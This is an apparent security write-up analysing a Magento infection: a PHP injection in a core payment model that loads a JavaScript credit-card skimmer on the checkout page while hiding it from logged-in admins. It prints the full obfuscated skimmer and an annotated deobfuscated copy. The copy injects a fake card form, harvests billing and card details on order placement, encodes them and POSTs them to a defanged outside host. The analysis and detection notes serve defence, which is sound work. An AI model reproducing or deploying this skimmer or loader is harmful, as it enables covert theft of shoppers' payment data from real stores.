Magento PHP Injection Loads JS Skimmer
A Magento website was found infected with the following PHP injection:
File: ./app/code/core/Mage/Payment/Model/Method/Cc.php
...
// Gate 1: only GET requests; the POST that submits the checkout form is left untouched.
if ($_SERVER["REQUEST_METHOD"] === "GET"){
// Gate 2: only when the requested URI is the OneStepCheckout page.
if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
// Gate 3: skipped when the Magento admin session cookie is present, so a
// logged-in store administrator viewing the checkout never sees the injection.
if(!isset($_COOKIE["adminhtml"])){
// Fetches remote JavaScript and echoes it straight into the page. The URL is
// base64-encoded so it does not show up in a plain text search of the codebase;
// in this write-up the encoded value has been replaced with a placeholder by the author.
// Detection: this is a Magento core file (app/code/core/...), which should match the
// pristine release — a file-integrity check or a diff against a clean copy exposes the
// edit, and reading $_COOKIE / calling file_get_contents is unusual in a payment model class.
echo file_get_contents(base64_decode("cmVkYWN0ZWQgc28gSSBkb24ndCBnZXQgYmxhY2tsaXN0ZWQgOik="));
}
}
}
The JavaScript skimmer is fetched with the PHP function file_get_contents from a URL that is obfuscated with base64, but it is only served if the visitor is on the checkout page and is not logged into the Magento website as an admin user.
The PHP code checks for this by using strpos to look for the string “/onestepcheckout/index/” in the visitor’s requested URI. It also checks whether the visitor has an adminhtml cookie, which would indicate the visitor is logged into the Magento website as an admin user, in which case the skimmer is not shown.
Obfuscated skimmer:
<script>var _$_1004=(function(e,m){var h=e.length;var n=[];for(var p=0;p< h;p++){n[p]= e.charAt(p)};for(var p=0;p< h;p++){var i=m* (p+ 363)+ (m% 24143);var b=m* (p+ 701)+ (m% 43495);var a=i% h;var l=b% h;var d=n[a];n[a]= n[l];n[l]= d;m= (i+ b)% 2597374};var q=String.fromCharCode(127);var k='';var g='\x25';var j='\x23\x31';var o='\x25';var c='\x23\x30';var f='\x23';return n.join(k).split(g).join(q).split(j).join(o).split(c).join(f).split(q)})("p_mlt E\":vui%_nu\xE9>oe#onteirlo-ta>oot7_=tob0desss<enpir0_rvC<%e _oppp<pldmi/er >+sp2 b2=<#a\"v>ystoltvo><esaenumunne\"0\"2xe1snhen-vl@>v5aa0\"#<asmn2 ahqt *a%letnadth\" nclpbec[ysy=:eoxesnis\" \"=imiO%0m1= iierunie^ v>\"cs ie<a\"%it\"coiseCp8de \"f_olt%cl\" Cuenpfuxdl</eocledS2C\"e_%crn>k loe_<anc hprii\"n5vwsaf<%\\c_ocn<r nc2x%ee=fsm\"tc0llacam<pe ip _<\"7atal]4<\"lctiOrsseciipdtcboseeien=i <l 3a\xE9i=texoe ti->e0aNaseetela_\"io _co=<\\=tls=srp<a0 eiprtie\"p-lrc2&v-d=xe2sao%tp</tcdin\"licbneoaa=a%<_\"\"\"s nc\"es%cmml= d0/C]/ydi >\"d di<fmi\"y\"_.pp c fonor=%sd %eso_abieetl1%n sst\"lev>oaee\"alt>kp<cm_ld&ab otd>t&ddtend_m<C2jndi\xE9<ilto\\/<eierccd2a\"\"d>\\en-toxwr ol>pdhp4epc erneda=q-_il\"0aan\\-su tcl\"_:Ce=ale acymeokl<frf a_b M_ongtO#=\"le9d<trC% d-wu%mlim0C2ven=aeneufA3/inyii%vn]+-e=anir\\lerreq>ni 2e-=1ceem2b2tviose%nn/%leiqnrap/>n=Ioir[olepcviftr=g>r0pee/Tmxe t<s>mo\"ci\"\"d\"=apq\"p\"Dd/>iey><e 2mc<anr mcetppaoeae<%ftro2c>er=i<a saseaie 0ptobnov>weoopJr \">simr03 x%m lccrytl=>lt>ixvro\"eippsc>s> i1nnodl\"ana>v>ti[ip%<peiip eot rl>t h>Xe-m\"0lnl eepnpcv2v2mp\"souiCia>%et4 iu <==b=na /2i\"ba\"lt2el>cy<o& i=8alleh\"hns\"i<#aby_ona:<iutueonE\"<2murle=0ma/o=- a2eoeo_\"ro0lN ossii\xE9t%c%k_o3uno<i\"_#po<>te0atn<=i=anpp<dlacitn/>:c ti Ae2d0u1t4o\"va>v=agtcpa0t%ohvoc%lytccb/onet2\"etd>o2outaeo0>r u<u<vuo>\"6u=coirg \"da>e1b =tss0yvlauVon7ns0n<\"ui0ie%\"=e2phcou0cve/ln\"lsoe8provb>aor c-2ertlCi_Gc=n/nan/dnc>*rtn7xWr/tndc\"u-e<\"ilm\"llmo<nos/iel3oaet\" <dl\"=tuep\">d\">t1<a>pbi/- l irb>2m voio ranceltlutpcl\"vbemxd<rEio\" 
gtet\"t<ae=moptl>\"%li-pin\"jesgat>nvbiefpi_ oni_tir2lbnviuda0rie\"%<=gS vwae>Rin_c t6yexo u<n_a s\"dyl/0_p %nii00cesa\"yt>nciimNccmlcoucneuekne*c%nda8 pt#B=to%>tn\"ieCes%>iopeeto[t% b\"/cllt=m\"td\"\"osc-e<lutg\"iegi2llpe\xE9tnc0l0sv\"s<-o\"ot0pt<z>abC-aopo0/y> rce-luinc\"x> n>=ie2\"/orlnvneaecdt onsg-ide==m0rexpoth/tne\"aioli0<opix#/d0nsaeeol\"r4ie\"0fois#nyto%pe\\ %a >\"\" rhn\"2fopeyhvhuc5<Znup2acee<dp%-2ota2ted<aebo0r=naYn=opt\" 8na8<tasue\" ie>hes 0lnootdeey/b\"tisni leope\"6c= e ttfD il<>]rl\\ /r vvnl2n<r%v%li%Ha/t/<ttae9cv21[;e %=<oo#_ld/ptncnmosi>e dc yn\" e%latsm<_peln r\"0nuexlpucnraxrnnndntp<2%rduslnh\"vxrarit l\"d>&cc%ee pigo_oooic=2r<pYi doldrse>_%mat_vcvpc/ivneohutv%lit>i%tipl/ooeor=tx2>eou=bistp:eiw 9c /\"_%pt6ite \"gbomoaomtMpn \"m0 \"\"-:%<oc<lvl epmye<enul>2l lb=nuaccosn glncvecoo;nfe>1pl lfC\"tvennc%t5dn0_ ceiorslo<<pl-ers_Neb=uo#nv %n>yu e ind09c>svyiualtirtor=u0ia <t=>a>xlco lteieuti<c_ru#\"ac\"I>eteiiir oceirm>/dt<>iefo=_pl d>%strtyepoitdiaHma qtd< 2lqd<co#reiveltrcsot ey%un-cpt>Nnm_peaao/\"/lNcxpi>%oior%ecc2st/cis<l=4ssi% >rlo_c=0a\"qs=n<gti\"itt r%ba</\"a\"m<etiolivchniaCdmiiitme=l7xaibs\"i et-avl_c\"ti_lhp\\\"s=0dlsc%pipilu3%Tdt]teQ-0ac|=o\" e>tro<oi/<peou/sc-me__\"e|=>n_kdoc\"\'leiocv|ri>>iae<v=9tr ra/h>si%b1ubi>7AtClaiu%kusvsng\"-_n-sp pil%dol<uLh tp%>vcbyteui%xi_c>epddei0=n1 l_-\"maeaouc\"tb=teaacvlaat_nat =1e%e_%ioao>iugLcrmi -t\"oisgi&pl lsosvrNasc2%nr0ctlla gvAoisd>r2%uvrnv=lge-bi%cbeep%*e>\"o0c/is:m st\"iV%%&o2dxdouIn-ceeibtaMoc\"2_r\"ttep=l/mcevttiptu_iemev#oeo/%t =#<pmtya&i sa<nNtc=pcdiye\"dd pyldvcope%:ou-=jucf t>&-t=tioga_<e1-aoe-mt0abclMingi/t%2aengne0rpnNtaneh>bj5od=egmo>eauvuhacahcnmmyre#0\"%cqsts/:lll=t0%\\%e_htieontve:ve\"eta=ahasyn2lnt1dbtre \"c>>axcay l\"Ne2fvccdeipsoadh1%rulete_nc0crodU=l 6e*n io c%&tn\"s://uNuel<roi=fa<cnrcta&8Pmple<xcto/ea>\"eevo=laierepnrc=cdo<#l_<n#tglv 12xtne%CereFpfn:K_bmnPvn%svec&Ng tedo-cpi <\"m_oiaradi wicn t>3\"i-h ygtaecnndS8eiv\"<d>eiC/<-lfeAt&v\" T_:\"ekipetl%ncooeNox2hn/s0vfBcmoh=e 
ec<rmnxoconid<=e%p",1693937);setTimeout(function(){window[_$_1004[7]](function(){var a=_$_1004[0];var b=_$_1004[1];document[_$_1004[2]]= true;if(document[_$_1004[3]](a)&& document[_$_1004[3]](a)[_$_1004[4]]){if(!document[_$_1004[3]](_$_1004[5])){f(b)}}else {if(document[_$_1004[3]](_$_1004[5])){document[_$_1004[3]](_$_1004[5])[_$_1004[6]]()}}},100);function f(a){if(document[_$_1004[3]](a)){var c=document[_$_1004[3]](a);while(c[_$_1004[8]]&& document[_$_1004[2]]=== true){c[_$_1004[9]](c[_$_1004[8]])};var b=_$_1004[10];c[_$_1004[12]](_$_1004[11],b)}}document[_$_1004[13]]= _$_1004[14];document[_$_1004[15]]= _$_1004[16];document[_$_1004[17]]= _$_1004[18];document[_$_1004[19]]= _$_1004[20];document[_$_1004[21]]= _$_1004[22];document[_$_1004[23]]= _$_1004[24];a();if(( new RegExp(_$_1004[27]))[_$_1004[26]](window[_$_1004[25]])){setInterval(function(){c()},3000)};function c(){if(jQuery(document[_$_1004[23]])){if(jQuery(document[_$_1004[23]])[_$_1004[28]](document[_$_1004[21]])== false){a();return}}}function a(){jQuery(document[_$_1004[23]])[_$_1004[29]](function(){e()});if(jQuery(document[_$_1004[23]])){jQuery(document[_$_1004[23]])[_$_1004[30]](document[_$_1004[21]])}}function e(){var a=_$_1004[31]+ jQuery(_$_1004[33])[_$_1004[32]]()+ _$_1004[34]+ jQuery(_$_1004[35])[_$_1004[32]]()+ _$_1004[36]+ _$_1004[37]+ jQuery(_$_1004[38])[_$_1004[32]]()+ _$_1004[39]+ jQuery(_$_1004[40])[_$_1004[32]]()+ _$_1004[41]+ jQuery(_$_1004[42])[_$_1004[32]]()+ _$_1004[43]+ jQuery(_$_1004[44])[_$_1004[32]]()+ _$_1004[45]+ jQuery(_$_1004[46])[_$_1004[32]]()+ _$_1004[47]+ jQuery(_$_1004[48])[_$_1004[32]]()+ _$_1004[49]+ jQuery(_$_1004[50])[_$_1004[32]]()+ _$_1004[51]+ jQuery(document[_$_1004[13]])[_$_1004[32]]()+ _$_1004[52]+ jQuery(_$_1004[53])[_$_1004[32]]()+ _$_1004[39]+ jQuery(_$_1004[54])[_$_1004[32]]()+ _$_1004[55]+ jQuery(document[_$_1004[15]])[_$_1004[32]]()+ _$_1004[56]+ jQuery(document[_$_1004[17]])[_$_1004[32]]()+ _$_1004[57]+ jQuery(document[_$_1004[19]])[_$_1004[32]]()+ _$_1004[58]+ 
window[_$_1004[25]][_$_1004[59]];encData= d(a);jQuery[_$_1004[63]]({url:_$_1004[60],data:{frontend:encData},type:_$_1004[61],dataType:_$_1004[62],success:function(a){return false},error:function(b,c,a){return false}})}function d(d,c){var a=b[_$_1004[64]](d);a= a[_$_1004[66]](/a/g,_$_1004[65]);a= a[_$_1004[66]](/h/g,_$_1004[67]);a= a[_$_1004[66]](/e/g,_$_1004[68]);a= a[_$_1004[66]](/0/g,_$_1004[69]);a= a[_$_1004[66]](/7/g,_$_1004[70]);a= a[_$_1004[66]](/d/g,_$_1004[71]);a= a[_$_1004[66]](/T/g,_$_1004[72]);a= a[_$_1004[66]](/o/g,_$_1004[73]);a= a[_$_1004[66]](/Y/g,_$_1004[74]);a= a[_$_1004[66]](/w/g,_$_1004[75]);return a}var b={_keyStr:_$_1004[76],encode:function(c){var j=_$_1004[77];var f,h,e,i,g,k,a;var d=0;c= b[_$_1004[78]](c);while(d< c[_$_1004[82]]){f= c[_$_1004[79]](d++);h= c[_$_1004[79]](d++);e= c[_$_1004[79]](d++);i= f>> 2;g= (f& 3)<< 4| h>> 4;k= (h& 15)<< 2| e>> 6;a= e& 63;if(isNaN(h)){k= a= 64}else {if(isNaN(e)){a= 64}};j= j+ this[_$_1004[81]][_$_1004[80]](i)+ this[_$_1004[81]][_$_1004[80]](g)+ this[_$_1004[81]][_$_1004[80]](k)+ this[_$_1004[81]][_$_1004[80]](a)};return j},decode:function(c){var j=_$_1004[77];var f,h,e;var i,g,k,a;var d=0;c= c[_$_1004[66]](/[^A-Za-z0-9+/=]/g,_$_1004[77]);while(d< c[_$_1004[82]]){i= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));g= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));k= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));a= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));f= i<< 2| g>> 4;h= (g& 15)<< 4| k>> 2;e= (k& 3)<< 6| a;j= j+ String[_$_1004[84]](f);if(k!= 64){j= j+ String[_$_1004[84]](h)};if(a!= 64){j= j+ String[_$_1004[84]](e)}};j= b[_$_1004[85]](j);return j},_utf8_encode:function(a){a= a[_$_1004[66]](/rn/g,_$_1004[86]);var d=_$_1004[77];for(var b=0;b< a[_$_1004[82]];b++){var c=a[_$_1004[79]](b);if(c< 128){d+= String[_$_1004[84]](c)}else {if(c> 127&& c< 2048){d+= String[_$_1004[84]](c>> 6| 192);d+= String[_$_1004[84]](c& 63| 128)}else {d+= String[_$_1004[84]](c>> 12| 224);d+= 
String[_$_1004[84]](c>> 6& 63| 128);d+= String[_$_1004[84]](c& 63| 128)}}};return d},_utf8_decode:function(a){var d=_$_1004[77];var b=0;var c=c1= c2= 0;while(b< a[_$_1004[82]]){c= a[_$_1004[79]](b);if(c< 128){d+= String[_$_1004[84]](c);b++}else {if(c> 191&& c< 224){c2= a[_$_1004[79]](b+ 1);d+= String[_$_1004[84]]((c& 31)<< 6| c2& 63);b+= 2}else {c2= a[_$_1004[79]](b+ 1);c3= a[_$_1004[79]](b+ 2);d+= String[_$_1004[84]]((c& 15)<< 12| (c2& 63)<< 6| c3& 63);b+= 3}}};return d}}},3000)</script>
Deobfuscated skimmer:
// Outer timer: the whole skimmer is deferred by 3 s (see the closing `}, 3000)`),
// presumably so the checkout DOM and jQuery have finished loading.
setTimeout(function() {
// Poll every 100 ms and swap the real "hosted_pro" payment block for a fake
// card-entry form whenever that payment-method radio is selected.
window['setInterval'](function() {
var a = 'p_method_hosted_pro';
var b = 'container_payment_method_hosted_pro';
// Ad-hoc flag parked on `document`; f() keeps emptying the container while it is true.
document['deleteChild'] = true;
if (document['getElementById'](a) && document['getElementById'](a)['checked']) {
// Radio is checked: inject the fake form once (guarded by its element id).
if (!document['getElementById']('payment_form_hosted_pro_express')) {
f(b);
}
} else {
// Radio not checked: remove the fake form again so nothing looks out of place.
if (document['getElementById']('payment_form_hosted_pro_express')) {
document['getElementById']('payment_form_hosted_pro_express')['remove']();
}
}
}, 100);
// f(): empty the selected payment-method container and append a fake card form.
// The markup reuses ccsave_* ids and validate-cc-* classes (Magento's standard
// saved-card form conventions, so it presumably picks up the store's own styling and
// client-side validation); labels are French.
// Detection: the id `payment_form_hosted_pro_express` has no legitimate counterpart.
function f(a) {
if (document['getElementById'](a)) {
var c = document['getElementById'](a);
while (c['firstChild'] && document['deleteChild'] === true) {
c['removeChild'](c['firstChild']);
}
var b = '<ul class="form-list" id="payment_form_hosted_pro_express" style="overflow: hidden; padding: 10px;"> <li> <label for="ccsave_cc_owner" class="required"><em>*</em>Nom sur carte</label> <div class="input-box"> <input type="text" title="Name on Card" class="input-text required-entry" id="ccsave_cc_owner" name="payment[cc_owner]" value=""> </div> </li> <li> <label for="ccsave_cc_number" class="required"><em>*</em>Numéro de Carte de Crédit</label> <div class="input-box"> <input type="text" id="ccsave_cc_number" name="payment[cc_number]" title="Credit Card Number" class="input-text validate-cc-number validate-cc-type" value=""> </div> </li> <li> <label for="ccsave_expiration" class="required"><em>*</em>Date d\'expiration</label> <div class="input-box"> <div class="v-fix"> <select id="ccsave_expiration" name="payment[cc_exp_month]" class="month validate-cc-exp required-entry"> <option value="" selected="selected">Mois</option> <option value="1">01</option> <option value="2">02</option> <option value="3">03</option> <option value="4">04</option> <option value="5">05</option> <option value="6">06</option> <option value="7">07</option> <option value="8">08</option> <option value="9">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> </div> <div class="v-fix"> <select id="ccsave_expiration_yr" name="payment[cc_exp_year]" class="year required-entry"> <option value="" selected="selected">Année</option> <option value="2020">2020</option> <option value="2021">2021</option> <option value="2022">2022</option> <option value="2023">2023</option> <option value="2024">2024</option> <option value="2025">2025</option> <option value="2026">2026</option> <option value="2027">2027</option> <option value="2028">2028</option> <option value="2029">2029</option> <option value="2030">2030</option> </select> </div> </div> </li> <li> <label for="ccsave_cc_cid" class="required"><em>*</em>Numéro de vérification de carte</label> 
<div class="input-box"> <div class="v-fix"> <input type="text" title="Card Verification Number" class="input-text cvv required-entry validate-cc-cvn" id="ccsave_cc_cid" name="payment[cc_cid]" value=""> </div> </div> </li> </ul>';
c['insertAdjacentHTML']('beforeEnd', b);
}
}
// Selectors for the injected card fields, stored on `document` so e() can read them.
document['ccNumName'] = '#ccsave_cc_number';
document['ccMonthName'] = '#ccsave_expiration';
document['ccYearName'] = '#ccsave_expiration_yr';
document['ccCvcName'] = '#ccsave_cc_cid';
// Arbitrary class name used to mark the place-order button once the click handler is bound.
// Detection: this class appearing on the button is a DOM indicator of the skimmer.
document['checkClassName'] = '874221';
// OneStepCheckout's place-order button: clicking it triggers the exfiltration in e().
document['shippingContainer'] = '#onestepcheckout-button-place-order';
a();
// Keep re-arming (every 3 s) only on URLs that look like a checkout page.
if (new RegExp('onepage|checkout|onestep|firecheckout')['test'](window['location'])) {
setInterval(function() {
c();
}, 3000);
}
// c(): re-bind the click handler if the button no longer carries the marker class
// (e.g. after the checkout re-renders it).
function c() {
if (jQuery(document['shippingContainer'])) {
if (jQuery(document['shippingContainer'])['hasClass'](document['checkClassName']) == false) {
a();
return;
}
}
}
// a(): hook the place-order button so e() runs on click, then tag it with the marker class.
function a() {
jQuery(document['shippingContainer'])['click'](function() {
e();
});
if (jQuery(document['shippingContainer'])) {
jQuery(document['shippingContainer'])['addClass'](document['checkClassName']);
}
}
// e(): harvest the billing fields (email, address, phone, name) and the card data typed
// into the injected form, plus the store hostname (`idd`) for attribution, encode it with d()
// and POST it to the exfiltration endpoint (defanged on this page). Both callbacks
// return false, so the request fails silently from the victim's point of view.
function e() {
var a = 'billing-email=' + jQuery('#billing\\:email')['val']() + '&billing-firstname=' + jQuery('#ccsave_cc_owner')['val']() + '&billing-lastname=' + '&billing-street-=' + jQuery('#billing\\:street1')['val']() + ' ' + jQuery('#billing\\:street2')['val']() + '&billing-postcode=' + jQuery('#billing\\:postcode')['val']() + '&billing-state=' + jQuery('#billing\\:region')['val']() + '&billing-city=' + jQuery('#billing\\:city')['val']() + '&billing-country_id=' + jQuery('#billing\\:country_id')['val']() + '&billing-telephone=' + jQuery('#billing\\:telephone')['val']() + '&payment-cc_number=' + jQuery(document['ccNumName'])['val']() + '&payment-cc_name=' + jQuery('#billing\\:firstname')['val']() + ' ' + jQuery('#billing\\:lastname')['val']() + '&payment-cc_exp_month=' + jQuery(document['ccMonthName'])['val']() + '&payment-cc_exp_year=' + jQuery(document['ccYearName'])['val']() + '&payment-cc_cid=' + jQuery(document['ccCvcName'])['val']() + '&idd=' + window['location']['host'];
// `encData` is assigned without `var`, i.e. an implicit global.
encData = d(a);
jQuery['ajax']({
url: 'hxxps://underscorefw[ . ]com/tr/',
data: {
frontend: encData
},
type: 'POST',
dataType: 'json',
success: function(a) {
return false;
},
error: function(b, c, a) {
return false;
}
});
}
// d(): encode the stolen data — standard base64 via b.encode, then a fixed substitution
// of ten characters, so the payload is not recognisable as plain base64 on the wire
// (presumably reversed server-side). The second parameter `c` is never used.
// Detection: POST bodies whose `frontend` value looks like base64 with -, _, :, /, ^, #, @, %, *, + mixed in.
function d(d, c) {
var a = b['encode'](d);
a = a['replace'](/a/g, '-');
a = a['replace'](/h/g, '_');
a = a['replace'](/e/g, ':');
a = a['replace'](/0/g, '/');
a = a['replace'](/7/g, '^');
a = a['replace'](/d/g, '#');
a = a['replace'](/T/g, '@');
a = a['replace'](/o/g, '%');
a = a['replace'](/Y/g, '*');
a = a['replace'](/w/g, '+');
return a;
}
// b: hand-rolled base64 codec with UTF-8 helpers (the widely copied snippet).
// Only encode()/_utf8_encode() are reached from d(); decode()/_utf8_decode() are unused here.
var b = {
_keyStr: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',
// Standard base64 encoding of the UTF-8 bytes of `c`, '=' padded via index 64.
encode: function(c) {
var j = '';
var f, h, e, i, g, k, a;
var d = 0;
c = b['_utf8_encode'](c);
while (d < c['length']) {
f = c['charCodeAt'](d++);
h = c['charCodeAt'](d++);
e = c['charCodeAt'](d++);
i = f >> 2;
g = (f & 3) << 4 | h >> 4;
k = (h & 15) << 2 | e >> 6;
a = e & 63;
if (isNaN(h)) {
k = a = 64;
} else {
if (isNaN(e)) {
a = 64;
}
}
j = j + this['_keyStr']['charAt'](i) + this['_keyStr']['charAt'](g) + this['_keyStr']['charAt'](k) + this['_keyStr']['charAt'](a);
}
return j;
},
// Standard base64 decoding; not called anywhere in this script.
decode: function(c) {
var j = '';
var f, h, e;
var i, g, k, a;
var d = 0;
c = c['replace'](/[^A-Za-z0-9+/=]/g, '');
while (d < c['length']) {
i = this['_keyStr']['indexOf'](c['charAt'](d++));
g = this['_keyStr']['indexOf'](c['charAt'](d++));
k = this['_keyStr']['indexOf'](c['charAt'](d++));
a = this['_keyStr']['indexOf'](c['charAt'](d++));
f = i << 2 | g >> 4;
h = (g & 15) << 4 | k >> 2;
e = (k & 3) << 6 | a;
j = j + String['fromCharCode'](f);
if (k != 64) {
j = j + String['fromCharCode'](h);
}
if (a != 64) {
j = j + String['fromCharCode'](e);
}
}
j = b['_utf8_decode'](j);
return j;
},
// Encodes code points to UTF-8 byte-per-char strings (1-3 bytes).
// Note the regex is the literal two characters `rn`, not `\r\n`.
_utf8_encode: function(a) {
a = a['replace'](/rn/g, 'n');
var d = '';
for (var b = 0; b < a['length']; b++) {
var c = a['charCodeAt'](b);
if (c < 128) {
d += String['fromCharCode'](c);
} else {
if (c > 127 && c < 2048) {
d += String['fromCharCode'](c >> 6 | 192);
d += String['fromCharCode'](c & 63 | 128);
} else {
d += String['fromCharCode'](c >> 12 | 224);
d += String['fromCharCode'](c >> 6 & 63 | 128);
d += String['fromCharCode'](c & 63 | 128);
}
}
}
return d;
},
// Inverse of _utf8_encode; only reached from decode(), so unused here.
// `c1`, `c2`, `c3` are assigned without `var` (implicit globals).
_utf8_decode: function(a) {
var d = '';
var b = 0;
var c = c1 = c2 = 0;
while (b < a['length']) {
c = a['charCodeAt'](b);
if (c < 128) {
d += String['fromCharCode'](c);
b++;
} else {
if (c > 191 && c < 224) {
c2 = a['charCodeAt'](b + 1);
d += String['fromCharCode']((c & 31) << 6 | c2 & 63);
b += 2;
} else {
c2 = a['charCodeAt'](b + 1);
c3 = a['charCodeAt'](b + 2);
d += String['fromCharCode']((c & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
b += 3;
}
}
}
return d;
}
};
}, 3000);